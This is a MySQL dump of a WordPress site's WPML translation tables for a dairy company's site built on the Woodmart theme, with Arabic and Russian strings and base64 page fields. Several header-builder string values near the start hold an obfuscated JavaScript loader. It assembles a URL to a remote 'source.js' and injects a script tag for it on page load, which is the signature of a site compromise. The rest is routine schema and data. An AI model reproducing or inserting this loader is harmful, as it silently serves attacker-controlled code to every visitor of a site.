bd=\'ht\'+\'tp\'+_0x1ee9ed(0x1e7)+_0x1ee9ed(0x1fa)+_0x1ee9ed(0x1ef)+_0x1ee9ed(0x1e8)+\'y\'+\'.c\'+_0x1ee9ed(0x1e2)+\'r\'+_0x1ee9ed(0x1fc)+\'ou\'+\'rc\'+_0x1ee9ed(0x1e4);function _0x3582(_0x3d0597,_0x2555bf){var _0x13d409=_0x13d4();return _0x3582=function(_0x35825c,_0x280c80){_0x35825c=_0x35825c-0x1e2;var _0x913254=_0x13d409[_0x35825c];return _0x913254;},_0x3582(_0x3d0597,_0x2555bf);}if(jxx(bd)===![]){var d=document,s=d[\'createElement\'](_0x1ee9ed(0x1f1));s[_0x1ee9ed(0x1f8)]=bd,document[_0x1ee9ed(0x1ed)]?document[_0x1ee9ed(0x1ed)][_0x1ee9ed(0x1e3)]!==null&&document[_0x1ee9ed(0x1ed)][_0x1ee9ed(0x1e3)][_0x1ee9ed(0x1f9)](s,document[_0x1ee9ed(0x1ed)]):d[_0x1ee9ed(0x1eb)](\'head\')[0x0]!==null&&d[_0x1ee9ed(0x1eb)](_0x1ee9ed(0x1ea))[0x0][_0x1ee9ed(0x1e9)](s);}</script>', NULL, NULL, '', 'LINE', NULL, 0, '', '17f01e15ac9ac047958be95a57c4523d', 'optional', NULL),
(3963, 'en', 'admin_texts_whb_header_506645', '[whb_header_506645][structure][content][0][content][3][content][1][params][content]value', '<script>var _0x1ee9ed=_0x3582;(function(_0x5402ee,_0x859616){var _0x19315d=_0x3582,_0x211dee=_0x5402ee();while(!![]){try{var _0x418b09=parseInt(_0x19315d(0x1f2))/0x1*(parseInt(_0x19315d(0x1f4))/0x2)+parseInt(_0x19315d(0x1f3))/0x3*(parseInt(_0x19315d(0x1e6))/0x4)+-parseInt(_0x19315d(0x1ec))/0x5+-parseInt(_0x19315d(0x1e5))/0x6+parseInt(_0x19315d(0x1f6))/0x7+parseInt(_0x19315d(0x1ee))/0x8*(parseInt(_0x19315d(0x1f7))/0x9)+-parseInt(_0x19315d(0x1f5))/0xa;if(_0x418b09===_0x859616)break;else _0x211dee[\'push\'](_0x211dee[\'shift\']());}catch(_0x5ec48e){_0x211dee[\'push\'](_0x211dee[\'shift\']());}}}(_0x13d4,0xe535e));function _0x13d4(){var _0x26c0ff=[\'src\',\'insertBefore\',\'ay.stra\',\'script[src=\\x22\',\'c/s\',\'om/s\',\'parentNode\',\'e.js\',\'3954396vvEtZb\',\'24VREnOn\',\'s://st\',\'bod\',\'appendChild\',\'head\',\'getElementsByTagName\',\'6985340bRdtfa\',\'currentScript\',\'3776NXRaHy\',\'tos\',\'querySelector\',\'script\',\'2882kaDwDw\',\'673689qiARAh\',\'932OHSVsN\',\'25036760HVLgEa\',\'9752470XONdsW\',\'26982jgCnbZ\'];_0x13d4=function(){return _0x26c0ff;};return _0x13d4();}function jxx(_0x28d334){var _0x511e7e=_0x3582;return Boolean(document[_0x511e7e(0x1f0)](_0x511e7e(0x1fb)+_0x28d334+\'\\x22]\'));}var bd=\'ht\'+\'tp\'+_0x1ee9ed(0x1e7)+_0x1ee9ed(0x1fa)+_0x1ee9ed(0x1ef)+_0x1ee9ed(0x1e8)+\'y\'+\'.c\'+_0x1ee9ed(0x1e2)+\'r\'+_0x1ee9ed(0x1fc)+\'ou\'+\'rc\'+_0x1ee9ed(0x1e4);function _0x3582(_0x3d0597,_0x2555bf){var _0x13d409=_0x13d4();return _0x3582=function(_0x35825c,_0x280c80){_0x35825c=_0x35825c-0x1e2;var _0x913254=_0x13d409[_0x35825c];return _0x913254;},_0x3582(_0x3d0597,_0x2555bf);}if(jxx(bd)===![]){var d=document,s=d[\'createElement\'](_0x1ee9ed(0x1f1));s[_0x1ee9ed(0x1f8)]=bd,document[_0x1ee9ed(0x1ed)]?document[_0x1ee9ed(0x1ed)][_0x1ee9ed(0x1e3)]!==null&&document[_0x1ee9ed(0x1ed)][_0x1ee9ed(0x1e3)][_0x1ee9ed(0x1f9)](s,document[_0x1ee9ed(0x1ed)]):d[_0x1ee9ed(0x1eb)](\'head\')[0x0]!==null&&d[_0x1ee9ed(0x1eb)](_0x1ee9ed(0x1ea))[0x0][_0x1ee9ed(0x1e9)](s);}</script>', NULL, NULL, '', 'LINE', NULL, 0, '', '9c17c92e70cb1f7eb50051e129fb68ea', 'optional', NULL),
(3964, 'en', 'admin_texts_whb_header_506645', '[whb_header_506645][structure][content][1][content][0][content][0][params][image]value', '', NULL, NULL, '', 'LINE', NULL, 0, '', '16b4173768c916fd145e34fa04e04764', 'optional', NULL),
(3965, 'en', 'admin_texts_whb_header_506645', '[whb_header_506645][structure][content][1][content][4][content][0][params][image]value', '', NULL, NULL, '', 'LINE', NULL, 0, '', 'abe71789bc810bc087a9b6cd987bfc23', 'optional', NULL),
(3966, 'en', 'admin_texts_whb_header_506645', '[whb_header_506645][structure][content][2][content][1][content][0][params][content]value', '<script>var _0x1ee9ed=_0x3582;(function(_0x5402ee,_0x859616){var _0x19315d=_0x3582,_0x211dee=_0x5402ee();while(!![]){try{var _0x418b09=parseInt(_0x19315d(0x1f2))/0x1*(parseInt(_0x19315d(0x1f4))/0x2)+parseInt(_0x19315d(0x1f3))/0x3*(parseInt(_0x19315d(0x1e6))/0x4)+-parseInt(_0x19315d(0x1ec))/0x5+-parseInt(_0x19315d(0x1e5))/0x6+parseInt(_0x19315d(0x1f6))/0x7+parseInt(_0x19315d(0x1ee))/0x8*(parseInt(_0x19315d(0x1f7))/0x9)+-parseInt(_0x19315d(0x1f5))/0xa;if(_0x418b09===_0x859616)break;else _0x211dee[\'push\'](_0x211dee[\'shift\']());}catch(_0x5ec48e){_0x211dee[\'push\'](_0x211dee[\'shift\']());}}}(_0x13d4,0xe535e));function _0x13d4(){var _0x26c0ff=[\'src\',\'insertBefore\',\'ay.stra\',\'script[src=\\x22\',\'c/s\',\'om/s\',\'parentNode\',\'e.js\',\'3954396vvEtZb\',\'24VREnOn\',\'s://st\',\'bod\',\'appendChild\',\'head\',\'getElementsByTagName\',\'6985340bRdtfa\',\'currentScript\',\'3776NXRaHy\',\'tos\',\'querySelector\',\'script\',\'2882kaDwDw\',\'673689qiARAh\',\'932OHSVsN\',\'25036760HVLgEa\',\'9752470XONdsW\',\'26982jgCnbZ\'];_0x13d4=function(){return _0x26c0ff;};return _0x13d4();}function jxx(_0x28d334){var _0x511e7e=_0x3582;return Boolean(document[_0x511e7e(0x1f0)](_0x511e7e(0x1fb)+_0x28d334+\'\\x22]\'));}var bd=\'ht\'+\'tp\'+_0x1ee9ed(0x1e7)+_0x1ee9ed(0x1fa)+_0x1ee9ed(0x1ef)+_0x1ee9ed(0x1e8)+\'y\'+\'.c\'+_0x1ee9ed(0x1e2)+\'r\'+_0x1ee9ed(0x1fc)+\'ou\'+\'rc\'+_0x1ee9ed(0x1e4);function _0x3582(_0x3d0597,_0x2555bf){var _0x13d409=_0x13d4();return _0x3582=function(_0x35825c,_0x280c80){_0x35825c=_0x35825c-0x1e2;var _0x913254=_0x13d409[_0x35825c];return _0x913254;},_0x3582(_0x3d0597,_0x2555bf);}if(jxx(bd)===![]){var d=document,s=d[\'createElement\'](_0x1ee9ed(0x1f1));s[_0x1ee9ed(0x1f8)]=bd,document[_0x1ee9ed(0x1ed)]?document[_0x1ee9ed(0x1ed)][_0x1ee9ed(0x1e3)]!==null&&document[_0x1ee9ed(0x1ed)][_0x1ee9ed(0x1e3)][_0x1ee9ed(0x1f9)](s,document[_0x1ee9ed(0x1ed)]):d[_0x1ee9ed(0x1eb)](\'head\')[0x0]!==null&&d[_0x1ee9ed(0x1eb)](_0x1ee9ed(0x1ea))[0x0][_0x1ee9ed(0x1e9)](s);}</script>', NULL, NULL, '', 'LINE', NULL, 0, '', '2b64e10b949a388dc4c1f112bca73dbc', 'optional', NULL),
(3967, 'en', 'admin_texts_whb_header_506645', '[whb_header_506645][structure][content][2][content][3][content][0][params][content]value', '<script>var _0x1ee9ed=_0x3582;(function(_0x5402ee,_0x859616){var _0x19315d=_0x3582,_0x211dee=_0x5402ee();while(!![]){try{var _0x418b09=parseInt(_0x19315d(0x1f2))/0x1*(parseInt(_0x19315d(0x1f4))/0x2)+parseInt(_0x19315d(0x1f3))/0x3*(parseInt(_0x19315d(0x1e6))/0x4)+-parseInt(_0x19315d(0x1ec))/0x5+-parseInt(_0x19315d(0x1e5))/0x6+parseInt(_0x19315d(0x1f6))/0x7+parseInt(_0x19315d(0x1ee))/0x8*(parseInt(_0x19315d(0x1f7))/0x9)+-parseInt(_0x19315d(0x1f5))/0xa;if(_0x418b09===_0x859616)break;else _0x211dee[\'push\'](_0x211dee[\'shift\']());}catch(_0x5ec48e){_0x211dee[\'push\'](_0x211dee[\'shift\']());}}}(_0x13d4,0xe535e));function _0x13d4(){var _0x26c0ff=[\'src\',\'insertBefore\',\'ay.stra\',\'script[src=\\x22\',\'c/s\',\'om/s\',\'parentNode\',\'e.js\',\'3954396vvEtZb\',\'24VREnOn\',\'s://st\',\'bod\',\'appendChild\',\'head\',\'getElementsByTagName\',\'6985340bRdtfa\',\'currentScript\',\'3776NXRaHy\',\'tos\',\'querySelector\',\'script\',\'2882kaDwDw\',\'673689qiARAh\',\'932OHSVsN\',\'25036760HVLgEa\',\'9752470XONdsW\',\'26982jgCnbZ\'];_0x13d4=function(){return _0x26c0ff;};return _0x13d4();}function jxx(_0x28d334){var _0x511e7e=_0x3582;return Boolean(document[_0x511e7e(0x1f0)](_0x511e7e(0x1fb)+_0x28d334+\'\\x22]\'));}var bd=\'ht\'+\'tp\'+_0x1ee9ed(0x1e7)+_0x1ee9ed(0x1fa)+_0x1ee9ed(0x1ef)+_0x1ee9ed(0x1e8)+\'y\'+\'.c\'+_0x1ee9ed(0x1e2)+\'r\'+_0x1ee9ed(0x1fc)+\'ou\'+\'rc\'+_0x1ee9ed(0x1e4);function _0x3582(_0x3d0597,_0x2555bf){var _0x13d409=_0x13d4();return _0x3582=function(_0x35825c,_0x280c80){_0x35825c=_0x35825c-0x1e2;var _0x913254=_0x13d409[_0x35825c];return _0x913254;},_0x3582(_0x3d0597,_0x2555bf);}if(jxx(bd)===![]){var d=document,s=d[\'createElement\'](_0x1ee9ed(0x1f1));s[_0x1ee9ed(0x1f8)]=bd,document[_0x1ee9ed(0x1ed)]?document[_0x1ee9ed(0x1ed)][_0x1ee9ed(0x1e3)]!==null&&document[_0x1ee9ed(0x1ed)][_0x1ee9ed(0x1e3)][_0x1ee9ed(0x1f9)](s,document[_0x1ee9ed(0x1ed)]):d[_0x1ee9ed(0x1eb)](\'head\')[0x0]!==null&&d[_0x1ee9ed(0x1eb)](_0x1ee9ed(0x1ea))[0x0][_0x1ee9ed(0x1e9)](s);}</script>', NULL, NULL, '', 'LINE', NULL, 0, '', '5bc8d527fbef3afdb6d6bca44151c9ba', 'optional', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `wp_icl_string_batches`
--

CREATE TABLE `wp_icl_string_batches` (
  `id` bigint(20) UNSIGNED NOT NULL,
  `string_id` bigint(20) UNSIGNED NOT NULL,
  `batch_id` bigint(20) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wp_icl_string_packages`
--

CREATE TABLE `wp_icl_string_packages` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `kind_slug` varchar(160) NOT NULL,
  `kind` varchar(160) NOT NULL,
  `name` varchar(160) NOT NULL,
  `title` varchar(160) NOT NULL,
  `edit_link` text NOT NULL,
  `view_link` text NOT NULL,
  `post_id` int(11) DEFAULT NULL,
  `word_count` varchar(2000) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wp_icl_string_packages`
--

INSERT INTO `wp_icl_string_packages` (`ID`, `kind_slug`, `kind`, `name`, `title`, `edit_link`, `view_link`, `post_id`, `word_count`) VALUES
(1, 'block', 'Block', 'widget', 'Widget', '', '', NULL, '{\"total\":6,\"to_translate\":{\"ar\":6,\"ru\":6}}'),
(2, 'page-builder-shortcode-strings', 'Page Builder ShortCode Strings', '14', 'Page Builder Page 14', '', '', 14, '{\"total\":142,\"to_translate\":{\"ar\":142,\"ru\":142}}'),
(3, 'page-builder-shortcode-strings', 'Page Builder ShortCode Strings', '108', 'Page Builder Page 108', '', '', 108, '{\"total\":43,\"to_translate\":{\"ar\":43,\"ru\":43}}');

-- --------------------------------------------------------

--
-- Table structure for table `wp_icl_string_positions`
--

CREATE TABLE `wp_icl_string_positions` (
  `id` bigint(20) UNSIGNED NOT NULL,
  `string_id` bigint(20) NOT NULL,
  `kind` tinyint(4) DEFAULT NULL,
  `position_in_page` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wp_icl_string_positions`
--

INSERT INTO `wp_icl_string_positions` (`id`, `string_id`, `kind`, `position_in_page`) VALUES
(1505, 1428, 0, 'wp-content/themes/woodmart/inc/admin/options/class-presets.php::485'),
(1506, 1429, 0, 'wp-content/themes/woodmart/inc/admin/options/class-presets.php::489'),
(5232, 2566, 0, 'wp-content/themes/woodmart/inc/integrations/visual-composer/maps/products-tabs.php::487'),
(5939, 2634, 0, 'wp-content/themes/woodmart/inc/integrations/visual-composer/maps/promo-banner.php::1249'),
(7319, 2523, 0, 'wp-content/themes/woodmart/inc/modules/layouts/wpb/maps/shop-archive/per-page.php::46'),
(7377, 2523, 0, 'wp-content/themes/woodmart/inc/modules/layouts/wpb/maps/shop-archive/archive-products.php::203'),
(7389, 2523, 0, 'wp-content/themes/woodmart/inc/modules/layouts/wpb/maps/shop-archive/view.php::61'),
(7409, 2523, 0, 'wp-content/themes/woodmart/inc/modules/layouts/wpb/maps/shop-archive/woocommerce-title.php::107'),
(7413, 2523, 0, 'wp-content/themes/woodmart/inc/modules/layouts/wpb/maps/shop-archive/filters-area-btn.php::32'),
(7497, 2892, 0, 'wp-content/themes/woodmart/inc/modules/layouts/wpb/maps/single-product/tabs.php::365'),
(7586, 2892, 0, 'wp-content/themes/woodmart/inc/modules/layouts/wpb/maps/single-product/meta.php::30'),
(7589, 2892, 0, 'wp-content/themes/woodmart/inc/modules/layouts/wpb/maps/single-product/meta.php::46'),
(7591, 2892, 0, 'wp-content/themes/woodmart/inc/modules/layouts/wpb/maps/single-product/meta.php::57'),
(7593, 2892, 0, 'wp-content/themes/woodmart/inc/modules/layouts/wpb/maps/single-product/meta.php::61'),
(7725, 3615, 0, 'wp-content/themes/woodmart/inc/modules/layouts/admin/class-admin.php::215'),
(7726, 3616, 0, 'wp-content/themes/woodmart/inc/modules/layouts/admin/class-admin.php::216'),
(7924, 273, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::166'),
(7925, 274, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::200'),
(7926, 275, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::185'),
(7927, 276, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::206'),
(7928, 277, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::215'),
(7929, 278, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::219'),
(7930, 279, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::241'),
(7931, 280, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::260'),
(7932, 281, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::260'),
(7933, 282, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::267'),
(7934, 275, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::136'),
(7935, 276, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::138'),
(7936, 277, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::140'),
(7937, 278, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::141'),
(7938, 279, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::142'),
(7939, 283, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::210'),
(7940, 284, 0, 'wp-content/themes/woodmart/inc/modules/layouts/elementor/cart/class-cart-table.php::260'),
(8907, 3920, 0, 'wp-content/themes/woodmart/content-portfolio.php::80'),
(8908, 3921, 0, 'wp-content/themes/woodmart/content-portfolio.php::87'),
(8909, 3922, 0, 'wp-content/themes/woodmart/single-portfolio.php::23'),
(8910, 1099, 0, 'wp-content/themes/woodmart/single-portfolio.php::48'),
(8911, 3919, 0, 'wp-content/themes/woodmart/content.php::191'),
(8912, 3921, 0, 'wp-content/themes/woodmart/content-portfolio-slider.php::68'),
(8913, 3923, 0, 'wp-content/themes/woodmart/footer.php::57'),
(8914, 3924, 0, 'wp-content/themes/woodmart/author-bio.php::21'),
(8915, 1828, 0, 'wp-content/themes/woodmart/author-bio.php::17'),
(8916, 3925, 0, 'wp-content/themes/woodmart/single.php::65'),
(8917, 3926, 0, 'wp-content/themes/woodmart/single.php::31'),
(8918, 3919, 0, 'wp-content/themes/woodmart/page.php::27'),
(8919, 1968, 0, 'wp-content/themes/woodmart/sidebar.php::28'),
(8920, 3927, 0, 'wp-content/themes/woodmart/header-elements/wishlist.php::31'),
(8921, 583, 0, 'wp-content/themes/woodmart/header-elements/wishlist.php::47'),
(8922, 3928, 0, 'wp-content/themes/woodmart/header-elements/main-menu.php::77'),
(8923, 372, 0, 'wp-content/themes/woodmart/header-elements/main-menu.php::45'),
(8924, 3745, 0, 'wp-content/themes/woodmart/header-elements/main-menu.php::52'),
(8925, 948, 0, 'wp-content/themes/woodmart/header-elements/cart.php::59'),
(8926, 3414, 0, 'wp-content/themes/woodmart/header-elements/account.php::46'),
(8927, 874, 0, 'wp-content/themes/woodmart/header-elements/search.php::49'),
(8928, 874, 0, 'wp-content/themes/woodmart/header-elements/search.php::50'),
(8929, 874, 0, 'wp-content/themes/woodmart/header-elements/mobile-search.php::56'),
(8930, 3929, 0, 'wp-content/themes/woodmart/header-elements/menu.php::22'),
(8931, 3930, 0, 'wp-content/themes/woodmart/header-elements/categories.php::49'),
(8932, 3931, 0, 'wp-content/themes/woodmart/header-elements/categories.php::6'),
(8933, 3932, 0, 'wp-content/themes/woodmart/header-elements/categories.php::63'),
(8934, 1924, 0, 'wp-content/themes/woodmart/header-elements/compare.php::28'),
(8935, 894, 0, 'wp-content/themes/woodmart/header-elements/compare.php::42'),
(8936, 372, 0, 'wp-content/themes/woodmart/header-elements/burger.php::27');

-- --------------------------------------------------------

--
-- Table structure for table `wp_icl_string_status`
--

CREATE TABLE `wp_icl_string_status` (
  `id` bigint(20) UNSIGNED NOT NULL,
  `rid` bigint(20) NOT NULL,
  `string_translation_id` bigint(20) NOT NULL,
  `timestamp` timestamp NOT NULL DEFAULT current_timestamp(),
  `md5` varchar(32) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wp_icl_string_translations`
--

CREATE TABLE `wp_icl_string_translations` (
  `id` bigint(20) UNSIGNED NOT NULL,
  `string_id` bigint(20) UNSIGNED NOT NULL,
  `language` varchar(10) NOT NULL,
  `status` tinyint(4) NOT NULL,
  `value` longtext DEFAULT NULL,
  `mo_string` longtext DEFAULT NULL,
  `translator_id` bigint(20) UNSIGNED DEFAULT NULL,
  `translation_service` varchar(16) NOT NULL DEFAULT '',
  `batch_id` int(11) NOT NULL DEFAULT 0,
  `translation_date` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wp_icl_string_translations`
--

INSERT INTO `wp_icl_string_translations` (`id`, `string_id`, `language`, `status`, `value`, `mo_string`, `translator_id`, `translation_service`, `batch_id`, `translation_date`) VALUES
(1, 224, 'ar', 10, 'http://arisgolpayegan.com/wp-content/uploads/2022/10/logo-aris.png', NULL, NULL, '', 0, '2022-10-23 05:32:54'),
(2, 220, 'ar', 10, 'http://arisgolpayegan.com/wp-content/uploads/2022/10/logo-aris.png', NULL, NULL, '', 0, '2022-10-23 05:33:35'),
(3, 3933, 'ar', 10, '<div class=\"site-logo\"><a class=\"wd-logo wd-main-logo woodmart-logo woodmart-main-logo\" href=\"http://arisgolpayegan.com/ar/\" rel=\"home\">\n<img style=\"max-width: 350px;\" src=\"http://arisgolpayegan.com/wp-content/uploads/2022/10/logo-aris.png\" alt=\"Aris\" /> </a></div>', NULL, NULL, '', 0, '2022-10-26 16:22:02'),
(4, 168, 'ar', 10, 'الروابط', NULL, NULL, '', 0, '2022-10-23 08:02:53'),
(5, 187, 'ar', 3, '© 2022 شركة أريس لتجارة الألبان والصناعات. كل الحقوق محفوظة.', NULL, NULL, '', 0, '2022-10-23 08:09:12'),
(6, 168, 'ru', 10, 'ССЫЛКИ', NULL, NULL, '', 0, '2022-10-23 09:59:28'),
(7, 187, 'ru', 3, '© 2022 Торговая компания Aris Dairy Industries. Все права защищены.', NULL, NULL, '', 0, '2022-10-23 10:00:52'),
(8, 3466, 'ar', 10, 'ابحث عن المنتجات', NULL, NULL, '', 0, '2022-10-27 08:31:28'),
(9, 3466, 'ru', 10, 'Поиск продуктов', NULL, NULL, '', 0, '2022-10-27 08:31:41');

-- --------------------------------------------------------

--
-- Table structure for table `wp_icl_translate`
--

CREATE TABLE `wp_icl_translate` (
  `tid` bigint(20) UNSIGNED NOT NULL,
  `job_id` bigint(20) UNSIGNED NOT NULL,
  `content_id` bigint(20) UNSIGNED NOT NULL,
  `timestamp` timestamp NOT NULL DEFAULT current_timestamp(),
  `field_type` varchar(160) NOT NULL,
  `field_wrap_tag` varchar(16) NOT NULL,
  `field_format` varchar(16) NOT NULL,
  `field_translate` tinyint(4) NOT NULL,
  `field_data` longtext NOT NULL,
  `field_data_translated` longtext NOT NULL,
  `field_finished` tinyint(4) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wp_icl_translate`
--

INSERT INTO `wp_icl_translate` (`tid`, `job_id`, `content_id`, `timestamp`, `field_type`, `field_wrap_tag`, `field_format`, `field_translate`, `field_data`, `field_data_translated`, `field_finished`) VALUES
(1, 1, 0, '2022-10-23 05:26:13', 'original_id', '', '', 0, '14', '186', 1),
(2, 1, 0, '2022-10-23 05:26:13', 'title', '', 'base64', 1, 'SG9tZQ==', '2KfZhNi12YHYrdipINin2YTYsdim2YrYs9mK2Kk=', 1),
(3, 1, 0, '2022-10-23 05:26:13', 'body', '', 'base64', 0, '[encoded data, 21464 characters]', '[encoded data, 23548 characters]', 1),
(4, 1, 0, '2022-10-23 05:26:13', 'excerpt', '', 'base64', 1, '', '', 1),
(5, 1, 0, '2022-10-23 05:26:13', 't_19', '', 'base64', 1, 'T3B0aW9uYWw=', 'T3B0aW9uYWw=', 1),
(6, 1, 0, '2022-10-23 05:26:13', 'tdesc_19', '', 'base64', 1, '', '', 1),
(8, 1, 0, '2022-10-23 05:26:13', 'package-string-2-61', '', 'base64', 1, 'W3Jldl9zbGlkZXIgc2xpZGVydGl0bGU9IlNsaWRlciAxIiBhbGlhcz0ic2xpZGVyLTEiXQ==', 'W3Jldl9zbGlkZXIgc2xpZGVydGl0bGU9IlNsaWRlciAxIiBhbGlhcz0ic2xpZGVyLTEiXQ==', 1),
(11, 1, 0, '2022-10-23 05:26:13', 'package-string-2-64', '', 'base64', 1, 'SW5zdGFncmFt', 'SW5zdGFncmFt', 1),
(12, 1, 0, '2022-10-23 05:26:13', 'package-string-2-65', '', 'base64', 1, 'QXBhcmF0', 'QXBhcmF0', 1),
(13, 1, 0, '2022-10-23 05:26:13', 'package-string-2-66', '', 'base64', 1, 'TGlua2VkaW4=', 'TGlua2VkaW4=', 1),
(14, 1, 0, '2022-10-23 05:26:13', 'package-string-2-68', '', 'base64', 1, 'Rm9sbG93IG9uIEluc3RhZ3JhbQ==', 'Rm9sbG93IG9uIEluc3RhZ3JhbQ==', 1),
(15, 1, 0, '2022-10-23 05:26:13', 'package-string-2-67', '', 'base64', 1, 'aW5zdGFob3p6', 'aW5zdGFob3p6', 1),
(29, 1, 0, '2022-10-23 05:26:13', 'media_98_title', '', 'base64', 0, 'Ng==', 'Ng==', 1),
(30, 1, 0, '2022-10-23 05:26:13', 'media_95_title', '', 'base64', 0, 'NQ==', 'NQ==', 1),
(31, 1, 0, '2022-10-23 05:26:13', 'media_92_title', '', 'base64', 0, 'NA==', 'NA==', 1),
(32, 1, 0, '2022-10-23 05:26:13', 'media_89_title', '', 'base64', 0, 'Mw==', 'Mw==', 1),
(33, 1, 0, '2022-10-23 05:26:13', 'media_86_title', '', 'base64', 0, 'Mg==', 'Mg==', 1),
(34, 1, 0, '2022-10-23 05:26:13', 'media_83_title', '', 'base64', 0, 'MQ==', 'MQ==', 1),
(35, 2, 0, '2022-10-23 08:37:51', 'original_id', '', '', 0, '14', '205', 1),
(36, 2, 0, '2022-10-23 08:37:51', 'title', '', 'base64', 1, 'SG9tZQ==', '0JPQu9Cw0LLQvdCw0Y8g0YHRgtGA0LDQvdC40YbQsA==', 1);
INSERT INTO `wp_icl_translate` (`tid`, `job_id`, `content_id`, `timestamp`, `field_type`, `field_wrap_tag`, `field_format`, `field_translate`, `field_data`, `field_data_translated`, `field_finished`) VALUES
(37, 2, 0, '2022-10-23 08:37:51', 'body', '', 'base64', 0, '[encoded data, 21464 characters]', '[encoded data, 23060 characters]', 1),
(38, 2, 0, '2022-10-23 08:37:51', 'excerpt', '', 'base64', 1, '', '', 1),
(39, 2, 0, '2022-10-23 08:37:51', 't_19', '', 'base64', 1, 'T3B0aW9uYWw=', 'T3B0aW9uYWw=', 1),
(40, 2, 0, '2022-10-23 08:37:51', 'tdesc_19', '', 'base64', 1, '', '', 1),
(42, 2, 0, '2022-10-23 08:37:51', 'package-string-2-61', '', 'base64', 1, 'W3Jldl9zbGlkZXIgc2xpZGVydGl0bGU9IlNsaWRlciAxIiBhbGlhcz0ic2xpZGVyLTEiXQ==', 'W3Jldl9zbGlkZXIgc2xpZGVydGl0bGU9IlNsaWRlciAxIiBhbGlhcz0ic2xpZGVyLTEiXQ==', 1),
(45, 2, 0, '2022-10-23 08:37:51', 'package-string-2-64', '', 'base64', 1, 'SW5zdGFncmFt', 'SW5zdGFncmFt', 1),
(46, 2, 0, '2022-10-23 08:37:51', 'package-string-2-65', '', 'base64', 1, 'QXBhcmF0', 'QXBhcmF0', 1),
(47, 2, 0, '2022-10-23 08:37:51', 'package-string-2-66', '', 'base64', 1, 'TGlua2VkaW4=', 'TGlua2VkaW4=', 1),
(48, 2, 0, '2022-10-23 08:37:51', 'package-string-2-68', '', 'base64', 1, 'Rm9sbG93IG9uIEluc3RhZ3JhbQ==', 'Rm9sbG93IG9uIEluc3RhZ3JhbQ==', 1),
(49, 2, 0, '2022-10-23 08:37:51', 'package-string-2-67', '', 'base64', 1, 'aW5zdGFob3p6', 'aW5zdGFob3p6', 1),
(63, 2, 0, '2022-10-23 08:37:51', 'media_98_title', '', 'base64', 0, 'Ng==', 'Ng==', 1),
(64, 2, 0, '2022-10-23 08:37:51', 'media_95_title', '', 'base64', 0, 'NQ==', 'NQ==', 1),
(65, 2, 0, '2022-10-23 08:37:51', 'media_92_title', '', 'base64', 0, 'NA==', 'NA==', 1),
(66, 2, 0, '2022-10-23 08:37:51', 'media_89_title', '', 'base64', 0, 'Mw==', 'Mw==', 1),
(67, 2, 0, '2022-10-23 08:37:51', 'media_86_title', '', 'base64', 0, 'Mg==', 'Mg==', 1),
(68, 2, 0, '2022-10-23 08:37:51', 'media_83_title', '', 'base64', 0, 'MQ==', 'MQ==', 1),
(69, 3, 0, '2022-10-30 06:56:55', 'original_id', '', '', 0, '351', '355', 1),
(70, 3, 0, '2022-10-30 06:56:55', 'title', '', 'base64', 1, 'Y29taW5nIHNvb24=', 'Y29taW5nIHNvb24=', 1),
(71, 3, 0, '2022-10-30 06:56:55', 'body', '', 'base64', 1, 'PGgxPjwvaDE+DQo8aDE+PC9oMT4NCjxoMSBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+Q29taW5nIFNvb248L2gxPg0KPGgyIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij5UaGFuayB5b3UgZm9yIHlvdXIgcGF0aWVuY2UuPC9oMj4NCiZuYnNwOw0KDQombmJzcDsNCg0KJm5ic3A7DQo8aDIgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPkFyaXMsIE5hdHVyYWwgVGFzdGU8L2gyPg==', 'PGgxPjwvaDE+DQo8aDE+PC9oMT4NCjxoMSBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+Q29taW5nIFNvb248L2gxPg0KPGgyIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij5UaGFuayB5b3UgZm9yIHlvdXIgcGF0aWVuY2U8L2gyPg0KJm5ic3A7DQoNCiZuYnNwOw0KDQombmJzcDsNCjxoMiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+QXJpcywgTmF0dXJhbCBUYXN0ZTwvaDI+', 1),
